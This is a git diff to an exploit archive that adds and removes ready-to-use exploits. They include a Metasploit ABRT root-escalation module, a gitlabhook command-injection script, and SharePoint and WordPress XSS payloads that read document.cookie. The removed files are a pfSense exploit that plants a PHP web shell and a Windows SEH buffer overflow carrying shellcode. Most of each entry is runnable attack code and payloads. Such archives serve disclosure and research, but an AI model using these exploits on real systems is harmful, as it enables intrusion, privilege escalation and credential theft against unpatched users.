diff --git a/exploits/aspx/webapps/47417.txt b/exploits/aspx/webapps/47417.txt
new file mode 100644
index 000000000..e7a6b7547
--- /dev/null
+++ b/exploits/aspx/webapps/47417.txt
@@ -0,0 +1,177 @@
+# Exploit Title: Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistent Cross-Site Scripting
+# Author: Davide Cioccia
+# Discovery Date: 2019-09-25
+# Vendor Homepage: https://www.microsoft.com
+# Software Link: https://support.microsoft.com/en-us/help/2880552/description-of-microsoft-sharepoint-server-2013-service-pack-1-sp1
+# Tested Version: SP1
+# Tested on: Microsoft Windows Server 2016
+# CVE: CVE-2019-1262
+# Advisory ID: ZSL-2019-5533
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php
+# MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262
+
+Vendor: Microsoft Corporation
+Product web page: https://www.microsoft.com
+Affected version: 2013 SP1
+
+Summary: SharePoint is a web-based collaborative platform that
+integrates with Microsoft Office. Launched in 2001, SharePoint
+is primarily sold as a document management and storage system,
+but the product is highly configurable and usage varies substantially
+among organizations.
+
+Desc: A cross-site-scripting (XSS) vulnerability exists when Microsoft
+SharePoint Server does not properly sanitize a specially crafted web
+request to an affected SharePoint server. An authenticated attacker
+could exploit the vulnerability by sending a specially crafted request
+to an affected SharePoint server. The attacker who successfully exploited
+the vulnerability could then perform cross-site scripting attacks on
+affected systems and run script in the security context of the current
+user. The attacks could allow the attacker to read content that the
+attacker is not authorized to read, use the victim's identity to take
+actions on the SharePoint site on behalf of the user, such as change
+permissions and delete content, and inject malicious content in the
+browser of the user.
+
+Sharepoint 2013 SP1 allows users to upload files to the platform, but
+does not correctly sanitize the filename when the files are listed. An
+authenticated user that has the rights to upload files to the SharePoint
+platform, is able to exploit a Stored Cross-Site Scripting vulnerability
+in the filename. The filename is reflected in the attribute 'aria-label'
+of the following HTML tag.
+
+# PoC request:
+
+
+POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1
+Host: vulnerable_sharepoint_2013
+Connection: close
+Content-Length: 31337
+Cache-Control: max-age=0
+Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ==
+Origin: https://vulnerable_sharepoint_2013.tld
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
+Sec-Fetch-Mode: nested-navigate
+Sec-Fetch-User: ?1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Sec-Fetch-Site: same-origin
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6
+Cookie: ...
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOWebPartPage_PostbackSource"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_SelectedWpId"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_View"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_ShowSettings"
+
+False
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOGallery_SelectedLibrary"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOGallery_FilterString"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_Button"
+
+none
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTTARGET"
+
+ctl00$PlaceHolderMain$ctl00$RptControls$btnOK
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTARGUMENT"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_DisplayModeName"
+
+Browse
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_ExitingDesignMode"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOWebPartPage_Shared"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOLayout_LayoutChanges"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOLayout_InDesignMode"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_OldDisplayModeName"
+
+Browse
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_StartWebPartEditingName"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_EndWebPartEditing"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="_maintainWorkspaceScrollPosition"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__REQUESTDIGEST"
+
+[DIGEST]
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+[VIEWSTATE]
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
+
+E6912F23
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__SCROLLPOSITIONX"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__SCROLLPOSITIONY"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTVALIDATION"
+
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="destination"
+
+[DESTINATION_FOLDER]
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$InputFile"; filename="' onmouseover=alert(document.cookie) '.jpg"
+Content-Type: image/jpeg
+
+
+ZSL
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$OverwriteSingle"
+
+on
+------WebKitFormBoundaryewNI1MC6qaHDB50n--
\ No newline at end of file
diff --git a/exploits/json/webapps/47420.txt b/exploits/json/webapps/47420.txt
new file mode 100644
index 000000000..19dd79474
--- /dev/null
+++ b/exploits/json/webapps/47420.txt
@@ -0,0 +1,18 @@
+# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
+# Date: 2019-09-13
+# Exploit Author: Semen Alexandrovich Lyhin
+# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
+# Version: 0.0.17
+# Tested on: Kali Linux 2, Windows 10. 
+# CVE : CVE-2019-5485
+
+#!/usr/bin/python
+
+import requests
+
+target = "http://TARGET:3420"
+cmd = r"touch /tmp/poc.txt"
+json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
+r = requests.post(target, json)
+
+print "Done."
\ No newline at end of file
diff --git a/exploits/linux/local/47421.rb b/exploits/linux/local/47421.rb
new file mode 100755
index 000000000..a4aabd75e
--- /dev/null
+++ b/exploits/linux/local/47421.rb
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ABRT sosreport Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on RHEL systems with
+        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
+        as the crash handler.
+
+        `sosreport` uses an insecure temporary directory, allowing local users
+        to write to arbitrary files (CVE-2015-5287). This module uses a symlink
+        attack on `/var/tmp/abrt/cc-*$pid/` to overwrite the `modprobe` path
+        in `/proc/sys/kernel/modprobe`, resulting in root privileges.
+
+        Waiting for `sosreport` could take a few minutes.
+
+        This module has been tested successfully on:
+
+        abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; and
+        abrt 2.1.11-19.el7 on RHEL 7.1 x86_64.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rebel', # Discovery and sosreport-rhel7.py exploit
+          'bcoles' # Metasploit
+        ],
+      'DisclosureDate' => '2015-11-23',
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [[ 'Auto', {} ]],
+      'References'     =>
+        [
+          ['BID', '78137'],
+          ['CVE', '2015-5287'],
+          ['EDB', '38832'],
+          ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/01/1'],
+          ['URL', 'https://access.redhat.com/errata/RHSA-2015:2505'],
+          ['URL', 'https://access.redhat.com/security/cve/CVE-2015-5287'],
+          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1266837']
+        ]
+    ))
+    register_options [
+      OptInt.new('TIMEOUT', [true, 'Timeout for sosreport (seconds)', '600'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def timeout
+    datastore['TIMEOUT']
+  end
+
+  def check
+    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
+    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
+      vprint_error 'System is not configured to use ABRT for crash reporting'
+      return CheckCode::Safe
+    end
+    vprint_good 'System is configured to use ABRT for crash reporting'
+
+    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
+      vprint_error 'abrt-ccp service not running'
+      return CheckCode::Safe
+    end
+    vprint_good 'abrt-ccpp service is running'
+
+    # Patched in 2.1.11-35.el7
+    pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s
+    abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\s+/)[1]
+    if abrt_version.blank?
+      vprint_status 'Could not retrieve ABRT package version'
+      return CheckCode::Safe
+    end
+    unless Gem::Version.new(abrt_version) < Gem::Version.new('2.1.11-35.el7')
+      vprint_status "ABRT package version #{abrt_version} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "ABRT package version #{abrt_version} is vulnerable"
+
+    unless command_exists? 'python'
+      vprint_error 'python is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'python is installed'
+
+    CheckCode::Appears
+  end
+
+  def upload_and_chmodx(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    chmod path
+    register_file_for_cleanup path
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    exe_data = ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2015-5287', 'sosreport-rhel7.py')
+    exe_name = ".#{rand_text_alphanumeric 5..10}"
+    exe_path = "#{base_dir}/#{exe_name}"
+    upload_and_chmodx exe_path, exe_data
+
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    register_file_for_cleanup '/tmp/hax.sh'
+
+    print_status "Launching exploit - This might take a few minutes (Timeout: #{timeout}s) ..."
+    output = cmd_exec "echo \"#{payload_path}& exit\" | #{exe_path}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47413.py b/exploits/php/webapps/47413.py
deleted file mode 100755
index 355481786..000000000
--- a/exploits/php/webapps/47413.py
+++ /dev/null
@@ -1,167 +0,0 @@
-# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection
-# Date: 23/09/2018
-# Author: Nassim Asrir
-# Vendor Homepage: https://www.pfsense.org/
-# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
-# CVE: CVE-2019-16701
-# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3
-######################################################################################################
-
-1 : About Pfsense:
-==================
-
-pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.
-
-2 : Technical Analysis:
-=======================
-
-The pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands.
-
-XMLRPC methods:
-
-pfsense.exec_shell
-pfsense.exec_php
-pfsense.filter_configure
-pfsense.interfaces_carp_configure
-pfsense.backup_config_section
-pfsense.restore_config_section
-pfsense.merge_config_section
-pfsense.merge_installedpackages_section_xmlrpc
-pfsense.host_firmware_version
-pfsense.reboot
-pfsense.get_notices
-system.listMethods
-system.methodHelp
-system.methodSignature
-
-As we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php.
-
-2 : Static Analysis:
-====================
-
-In the static analysis we will analysis the xmlrpc.php file. 
-
-Line (73 - 82)
-
-This code check if the user have enough privileges.
-
-$user_entry = getUserEntry($username);
-		/*
-		 * admin (uid = 0) is allowed 
-		 * or regular user with necessary privilege
-		 */
-		if (isset($user_entry['uid']) && $user_entry['uid'] != '0' &&
-		    !userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) {
-			log_auth("webConfigurator authentication error for '" .
-			    $username . "' from " . $this->remote_addr .
-			    " not enough privileges");
-				
-
-Line (137 - 146)
-
-This part of code is the interest for us.
-
-As we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code).
-
-	public function exec_php($code) {
-		$this->auth();
-
-		eval($code);
-		if ($toreturn) {
-			return $toreturn;
-		}
-
-		return true;
-	}
-	
-Line (155 - 160)
-
-In this part of code also we have a check for auth then the execution for ($code)
-	
-	public function exec_shell($code) {
-		$this->auth();
-
-		mwexec($code);
-		return true;
-	}
-	
-3 - Exploit:
-============
-
-#!/usr/bin/env python
-
-import argparse
-import requests
-import urllib2
-import time
-import sys
-import string
-import random
-
-parser = argparse.ArgumentParser()
-parser.add_argument("--rhost", help = "Target Uri https://127.0.0.1")
-parser.add_argument("--password", help = "pfsense Password")
-args = parser.parse_args()
-
-rhost = args.rhost
-password = args.password
-print ""
-
-print "[+] CVE-2019-16701 - Pfsense - Remote Code Injection"
-print ""
-print "[+] Author: Nassim Asrir"
-print ""
-
-command = "<?xml version='1.0' encoding='iso-8859-1'?>"
-command += "<methodCall>"
-command += "<methodName>pfsense.host_firmware_version</methodName>"
-command += "<params>"
-command += "<param><value><string>"+password+"</string></value></param>"
-command += "</params>"
-command += "</methodCall>"
-
-stage1 = rhost + "/xmlrpc.php"
-
-page = urllib2.urlopen(stage1, data=command).read()
-
-print "[+] Checking Login Creds"
-
-
-if "Authentication failed" in page:
-
-	print "[-] Wrong password :("
-	sys.exit(0)
-else:
-
-	random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)])
-
-	print "[+] logged in successfully :)" 
-	print "[+] Generating random file "+random+".php"
-	print "[+] Sending the exploit ....."
-	
-
-	command = "<?xml version='1.0' encoding='iso-8859-1'?>"
-	command += "<methodCall>"
-	command += "<methodName>pfsense.exec_php</methodName>"
-	command += "<params>"
-	command += "<param><value><string>"+password+"</string></value></param>"
-	command += "<param><value><string>exec('echo \\'<pre> <?php $res = system($_GET[\"cmd\"]); echo $res ?> </pre>\\' > /usr/local/www/"+random+".php');</string></value></param>"
-	command += "</params>"
-	command += "</methodCall>"
-
-stage1 = rhost + "/xmlrpc.php"
-
-page = urllib2.urlopen(stage1, data=command).read()
-
-final = rhost+"/"+str(random)+".php"
-
-check = urllib2.urlopen(final)
-
-print "[+] Checking ....."
-
-if check.getcode() == 200:
-
-	print "[+] Yeah! You got your shell: " + final+"?cmd=id"
-else:
-
-	print "[+] Sorry :( Shell not found check the path"
\ No newline at end of file
diff --git a/exploits/php/webapps/47419.txt b/exploits/php/webapps/47419.txt
new file mode 100644
index 000000000..900a69721
--- /dev/null
+++ b/exploits/php/webapps/47419.txt
@@ -0,0 +1,41 @@
+# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
+# Date: 2019-09-10
+# Exploit Author: strider
+# Software Link: https://github.com/anttiviljami/wp-server-log-viewer
+# Version: 1.0
+# Tested on: Debian 10 Buster x64 / Kali Linux
+# CVE : None
+
+====================================[Description]====================================
+This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack.
+
+
+====================================[Codepart]====================================
+
+if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) {
+      // new log was added
+      $logs = get_option( 'server_logs' );
+      if( is_null( $logs ) ) {
+        $logs = [];
+      }
+
+      $log = trim( $_GET['logpath'] ); //only trimmed string no escaping
+      $logs[] = $log; //here the log will be added without security checks
+      $logs = array_values( $logs );
+
+      $index = array_search( $log, $logs );
+
+      update_option( 'server_logs', $logs );
+
+      wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) );
+    }
+
+
+
+====================================[Proof of Concept]====================================
+Add new log file to the plugin.
+paste this exploit into the form and submit it.
+
+<img src=# onerror=alert(document.cookie);>log.txt
+
+It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt
\ No newline at end of file
diff --git a/exploits/php/webapps/47422.txt b/exploits/php/webapps/47422.txt
new file mode 100644
index 000000000..f4f2361b4
--- /dev/null
+++ b/exploits/php/webapps/47422.txt
@@ -0,0 +1,83 @@
+# Exploit Title: YzmCMS 5.3 - 'Host' Header Injection
+# Exploit Author: Debashis Pal
+# Vendor Homepage: http://www.yzmcms.com/
+# Source: https://github.com/yzmcms/yzmcms
+# Version: YzmCMS V5.3
+# CVE : N/A
+# Tested on: Windows 7 SP1(64bit),XAMPP: 7.3.9
+
+#About YzmCMS
+==============
+YzmCMS is a lightweight open source content management system that uses OOP (Object Oriented) to develop its own framework.
+
+#Vulnerability 
+===============
+Host Header Injection.
+
+
+#PoC 
+=====
+#YzmCMS V5.3 Access Path: TARGET/yzmcms/
+
+curl http://TARGET/yzmcms/ -H "Host: www.google.com" 
+
+//sample output start
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html>
+  <head>
+      <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+	  <title>YzmCMS - 演示站</title>
+	  <link href="http://www.google.com/yzmcms/common/static/css/default_common.css" rel="stylesheet" type="text/css" />
+	  <link href="http://www.google.com/yzmcms/common/static/css/default_index.css" rel="stylesheet" type="text/css" />
+	  <script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/jquery-1.8.2.min.js"></script>
+	  <script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/js.js"></script>
+	  <script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/koala.min.1.5.js"></script> <!-- 焦点图js -->
+	  <meta name="keywords" content="yzmcms,YzmCMS演示站,yzmcms站点" />
+	  <meta name="description" content="本站是yzmcms演示站点" />
+	  <meta http-equiv="mobile-agent" content="format=xhtml;url=http://TARGET/yzmcms/index.php?m=mobile">
+      <script type="text/javascript">if(window.location.toString().indexOf('pref=padindex') != -1){}else{if(/AppleWebKit.*Mobile/i.test(navigator.userAgent) || (/MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(navigator.userAgent))){if(window.location.href.indexOf("?mobile")<0){try{if(/Android|Windows Phone|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)){window.location.href="http://TARGET/yzmcms/index.php?m=mobile";}else if(/iPad/i.test(navigator.userAgent)){}else{}}catch(e){}}}}</script>
+  </head>
+  <body>
+	   <!--mini登陆条-->
+<div id="head_login">
+<div class="w1000">
+<div id="mini">
+<a href="http://www.google.com/yzmcms/member/index/register.html" target="_blank">注册</a> <a href="http://www.google.com/yzmcms/member/index/login.html"  target="_blank">登录</a>
+</div>
+欢迎光临本站！
+</div>
+</div>
+<!--网站容器-->
+<div id="container">
+<div id="header">
+	<div id="logo">
+	 <a href="http://TARGET/yzmcms/"><img src="http://www.google.com/yzmcms/common/static/images/logo.png" title="YzmCMS - 演示站" alt="YzmCMS - 演示站"></a>
+	</div>
+	<div id="search">
+	<form method="get" action="http://www.google.com/yzmcms/index.php" target="_blank">
+		<div id="searchtxt" class="searchtxt">
+			<div class="searchmenu">	
+			
+
+//sample output End
+
+
+#Solution
+==========
+Don’t trust the host header. Only allow whitelist hostnames. 
+
+
+#Disclosure Timeline
+====================
+Vulnerability Discover Date: 18-Sep-2019
+Vulnerability Notification To vendor via Email: 18-Sep-2019, no responds
+Open issue in github : 22-Sep-2019, no responds
+Submit exploit-db : 25-Sep-2019
+
+
+#Disclaimer
+==========
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/exploits/windows/dos/47418.txt b/exploits/windows/dos/47418.txt
new file mode 100644
index 000000000..c6ddce52f
--- /dev/null
+++ b/exploits/windows/dos/47418.txt
@@ -0,0 +1,29 @@
+# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service
+# Date: 2019-20-09
+# Exploit Author: Emilio Revelo
+# Vendor Homepage: http://www.nsauditor.com/
+# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe
+# Tested on: Windows 10 Pro x64 es
+# Version: 2.9.5
+
+# Steps to produce the DoS: 
+
+# 1.- Run perl script : perl SpotIE.pl
+# 2.- Open SpotIE.txt and copy the content to clipboard
+# 3.- Open SpotIE Internet Explorer Password Recovery
+# 4.- Navigate to Register -> Enter the registration name and key below...
+# 5.- Paste ClipBoard on "Key:"
+# 7.- Ok
+# 8.- Observe the program crash.
+
+#!/usr/local/bin/perl
+
+use strict;
+use warnings;
+
+my $filename = 'SpotIE.txt';
+open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";
+print $fh "E"x256;
+close $fh;
+print "Done!\n";
+print "File: SpotIE.txt\n"
\ No newline at end of file
diff --git a/exploits/windows/local/47411.py b/exploits/windows/local/47411.py
deleted file mode 100755
index e50c58800..000000000
--- a/exploits/windows/local/47411.py
+++ /dev/null
@@ -1,87 +0,0 @@
-#!/usr/bin/python
-
-# Exploit Title: Easy File Sharing Web Server 7.2 local SEH overflow
-# Date: 9/23/2019
-# Exploit Author: x00pwn
-# Vendor Homepage: http://www.sharing-file.com/
-# Software Link: http://www.sharing-file.com/efssetup.exe
-# Version: 7.2
-# Tested on: Windows 7
-
-# Exploit summary: When adding a new user to the application, you can exploit a local SEH buffer overflow
-#                  by creating a malicious username, this exploit POC will create a malicious text file
-#                  with the contents to execute arbitrary code.
-# Author : Nu11pwn
-
-badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
-"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
-"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
-"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
-"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
-"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
-"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
-"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
-
-# found bad chars - "\x00\x0a\x0d"
-
-shellcode =  ""
-shellcode += "\xbb\xc4\x1c\xb2\xd3\xdd\xc2\xd9\x74\x24\xf4\x5e"
-shellcode += "\x2b\xc9\xb1\x31\x31\x5e\x13\x83\xc6\x04\x03\x5e"
-shellcode += "\xcb\xfe\x47\x2f\x3b\x7c\xa7\xd0\xbb\xe1\x21\x35"
-shellcode += "\x8a\x21\x55\x3d\xbc\x91\x1d\x13\x30\x59\x73\x80"
-shellcode += "\xc3\x2f\x5c\xa7\x64\x85\xba\x86\x75\xb6\xff\x89"
-shellcode += "\xf5\xc5\xd3\x69\xc4\x05\x26\x6b\x01\x7b\xcb\x39"
-shellcode += "\xda\xf7\x7e\xae\x6f\x4d\x43\x45\x23\x43\xc3\xba"
-shellcode += "\xf3\x62\xe2\x6c\x88\x3c\x24\x8e\x5d\x35\x6d\x88"
-shellcode += "\x82\x70\x27\x23\x70\x0e\xb6\xe5\x49\xef\x15\xc8"
-shellcode += "\x66\x02\x67\x0c\x40\xfd\x12\x64\xb3\x80\x24\xb3"
-shellcode += "\xce\x5e\xa0\x20\x68\x14\x12\x8d\x89\xf9\xc5\x46"
-shellcode += "\x85\xb6\x82\x01\x89\x49\x46\x3a\xb5\xc2\x69\xed"
-shellcode += "\x3c\x90\x4d\x29\x65\x42\xef\x68\xc3\x25\x10\x6a"
-shellcode += "\xac\x9a\xb4\xe0\x40\xce\xc4\xaa\x0e\x11\x5a\xd1"
-shellcode += "\x7c\x11\x64\xda\xd0\x7a\x55\x51\xbf\xfd\x6a\xb0"
-shellcode += "\x84\xfc\x9b\x09\x10\x68\x02\xf8\x59\xf4\xb5\xd6"
-shellcode += "\x9d\x01\x36\xd3\x5d\xf6\x26\x96\x58\xb2\xe0\x4a"
-shellcode += "\x10\xab\x84\x6c\x87\xcc\x8c\x0e\x46\x5f\x4c\xff"
-shellcode += "\xed\xe7\xf7\xff"
-
-# Log data, item 69
-# Address=0BADF00D
-# Message= 0x10000000 | 0x10050000 | 0x00050000 | False  | False   | False |  False   | False  | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
-
-# Log data, item 24
-# Address=100195F2
-# Message=  0x100195f2 : pop esi # pop ecx # ret  |  {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
-
-nseh = "\xEB\x06\x90\x90"
-seh = "\xF2\x95\x01\x10"
-
-payload  = "A" * 4059
-payload += nseh
-payload += seh
-payload += "\x90" * 16
-payload += shellcode
-payload += "D" *4000
-
-# SEH chain of main thread, item 1
-# Address=46336646
-# SE handler=*** CORRUPT ENTRY ***
-
-# Log data, item 34
-# Address=0BADF00D
-# Message=    SEH record (nseh field) at 0x0018a938 overwritten with normal pattern : 0x46336646 (offset 4059), followed by 933 bytes of cyclic data after the handler
-# [*] Exact match at offset 4059
-
-try:
-    evilCreate =open("exploit.txt","w")
-    print("""
-    Easy File Sharing web server SEH overflow
-    """)
-    print("[x] Creating malicious file")
-    evilCreate.write(payload)
-    evilCreate.close()
-    print("[x] Malicious file create")
-    print("[x] Go to user accounts and add a new user with malicious name")
-    print("[x] Watch the program crash")
-except:
-    print("[!] File failed to be created")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
